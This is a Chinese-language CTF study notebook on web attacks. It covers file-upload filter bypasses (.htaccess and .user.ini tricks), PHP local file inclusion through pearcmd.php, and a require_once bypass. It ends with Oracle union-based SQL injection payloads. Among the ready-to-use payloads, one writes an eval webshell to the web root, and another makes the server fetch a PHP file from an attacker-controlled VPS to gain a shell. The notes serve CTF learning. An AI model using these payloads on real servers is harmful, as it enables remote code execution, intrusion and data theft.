upload_lab补测

常见绕过

  • 前端拦截

前端都是纸老虎
简单的话就使用console修改前端js实现
复杂的话就上传一个正常文件,然后修改流量包

  • MIME类型判断

例如限制了

Content-Type: image/png

那么直接在上传木马时修改成对应的即可
不会影响文件的使用

  • 黑名单(过滤不全)

那么可以解析为php的文件后缀有很多
常见的:

php,php3,php4,php5,phtml

  • 黑名单(过滤全木马)

上传.htaccess文件
可以让更多的文件类型解析为php
示例:

<Directory />
  Options +Indexes +FollowSymLinks +ExecCGI
  AllowOverride All
  Order allow,deny
  Allow from all
  Require all granted
</Directory>

上传.user.ini文件

auto_prepend_file=test.txt

  • 文件名处理逻辑

加点,加空格,双写,0x00阶段
不重复写了

LFI

php pear文件包含漏洞

全称为PHP Extension and Application Repository
开启了register_argc_argv这个选项
url中?后面的内容都会传入$_SERVER[‘argv’]这个变量里
argv是通过+作为分隔符
pear文件源码:

#!/bin/sh

# first find which PHP binary to use
if test "x$PHP_PEAR_PHP_BIN" != "x"; then
  PHP="$PHP_PEAR_PHP_BIN"
else
  if test "/usr/bin/php" = '@'php_bin'@'; then
    PHP=php
  else
    PHP="/usr/bin/php"
  fi
fi

# then look for the right pear include dir
if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then
  INCDIR=$PHP_PEAR_INSTALL_DIR
  INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR"
else
  if test "/usr/share/php" = '@'php_dir'@'; then
    INCDIR=`dirname $0`
    INCARG=""
  else
    INCDIR="/usr/share/php"
    INCARG="-d include_path=/usr/share/php"
  fi
fi

exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"

当执行了pear时,会将$_SERVER[‘argv’]当作参数一起执行,从而自动拉取了指定的php文件

  • newstarctf 2023公开赛道include 🍐

<?php
    error_reporting(0);
    if(isset($_GET['file'])) {
        $file = $_GET['file'];
        
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        
        include($file.".php");
        # Something in phpinfo.php!
    }
    else {
        highlight_file(__FILE__);
    }
?>

根据提示找到phpinfo.php
发现fake{Check_register_argc_argv}
于是查看register_argc_argv都是on
且php服务的路径为/usr/local/etc/php
而当前网页的路径为SCRIPT_FILENAME /var/www/html/index.php
所以可以使用pearcmd.php进行命令的执行
pear命令可使用的参数:

构造:

?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/var/www/html/a.php

在服务器中运行的命令实际为:

pear config-create "/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>" /var/www/html/a.php

最后包含a.php即可完成getshell
PS:尖括号用burpsuite发
https://whhxy4.github.io/2023/10/18/%E5%85%B3%E4%BA%8E%E5%88%A9%E7%94%A8pearcmd%E8%BF%9B%E8%A1%8C%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/#:~:text=PHP%E8%A3%B8%E6%96%87%E4%BB%B6

  • [极客大挑战2024]ez_include

题目:

<?php
highlight_file(__FILE__);
require_once 'starven_secret.php';
if(isset($_GET['file'])) {
    if(preg_match('/starven_secret.php/i', $_GET['file'])) {
        require_once $_GET['file'];
    }else{
        echo "还想非预期?";
    }
}

是一个绕过require_once包含限制的题
详见https://www.anquanke.com/post/id/213235
payload:

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/starven_secret.php

成功进入第二步/levelllll2.php:

<?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_GET ["syc"])){
    $file = $_GET ["syc"];
    $hint = "register_argc_argv = On";
    if (preg_match("/config|create|filter|download|phar|log|sess|-c|-d|%|data/i", $file)) {
        die("hint都给的这么明显了还不会做?");
    }
    if(substr($_SERVER['REQUEST_URI'], -4) === '.php'){
        include $file;
    }
}

观察到register_argc_argv = On,可能是pear文件包含漏洞
构造payload:

/levelllll2.php?syc=/usr/local/lib/php/pearcmd.php&+download+http://vps地址:vps端口/1.php

成功getshell

CVE-2024-2961

https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py

phar文件包含

Oracle

Oracle Database,又名 Oracle RDBMS,或简称 Oracle。
是甲骨文公司的一款关系数据库管理系统。
它是在数据库领域一直处于领先地位的产品。
可以说 Oracle 数据库系统是世界上流行的关系数据库管理系统,
系统可移植性好、使用方便、功能强,
适用于各类大、中、小微机环境。它是一种高效率的、
可靠性好的、适应高吞吐量的数据库方案。

数据库操作

• 查询数据库版本信息

-- 无需特权
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
-- 需要特权
SELECT version FROM v$instance;

• 查询操作系统版本

SELECT banner FROM v$version where banner like 'TNS%';

• 查询数据库运行的主机名

-- 需要特权
SELECT UTL_INADDR.get_host_name FROM dual;
-- 需要特权
SELECT host_name FROM v$instance;
-- 需要特权
SELECT UTL_INADDR.get_host_name('127.0.0.1') FROM dual;

• 查询当前用户权限的所有数据库

SELECT DISTINCT owner,table_name FROM all_tables WHERE owner=user;

• 查询当前用户权限的所有数据库

-- 无需特权
SELECT global_name FROM global_name;
-- 无需特权
SELECT SYS.DATABASE_NAME FROM DUAL;
-- 需要特权
SELECT name FROM v$database;
-- 需要特权
SELECT instance_name FROM v$instance;

• 查询数据库所有用户

-- 需要特权
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';

注入payload

https://blog.csdn.net/Javachichi/article/details/128711756

  • 判断数据库类型

    -- 使用 Oracle 专有的函数判断是否为 Oracle 数据库
    ?ename=-1' or to_char(1)=1--+
    ?ename=-1' or to_number('2e0')=2--+

  • 查询表名

    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name<>'BONUS'),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT','EMP')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT','EMP')),NULL from dual--+

  • 查询表中的字段名

    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB','MGR')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB','MGR','HIREDATE')),NULL from dual--+

  • 查询具体的数据

    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename<>'SMITH'),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename  not in ('SMITH','ALLEN')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename  not in ('SMITH','ALLEN','WARD')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename  not in ('SMITH','ALLEN','WARD','JONES')),NULL from dual--+s